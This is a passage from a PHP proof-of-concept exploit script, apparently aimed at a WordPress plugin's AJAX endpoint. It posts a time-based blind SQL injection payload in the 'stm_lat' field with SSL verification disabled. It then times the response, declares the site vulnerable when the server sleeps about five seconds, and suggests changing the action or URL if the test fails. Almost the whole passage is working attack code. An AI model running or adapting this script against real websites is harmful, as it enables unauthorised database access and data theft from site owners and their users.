    'radius'  => 100
);

echo "[+] Sending SQL injection payload to $ajax_url\n";
echo "[+] Payload: stm_lat = $payload\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

$duration = $end_time - $start_time;

echo "[+] HTTP Response Code: $http_code\n";
echo "[+] Response Time: " . round($duration, 2) . " seconds\n";

if ($duration >= 5 && $duration < 10) {
    echo "[!] Vulnerability confirmed! The server slept for approximately $duration seconds.\n";
    echo "[!] This indicates SQL injection is possible.\n";
} else {
    echo "[-] No significant time delay detected; the site may be patched or the action may differ.\n";
    echo "[-] Try adjusting the AJAX action or the target URL.\n";
}

echo "[+] Response body (truncated): " . substr($response, 0, 500) . "\n";
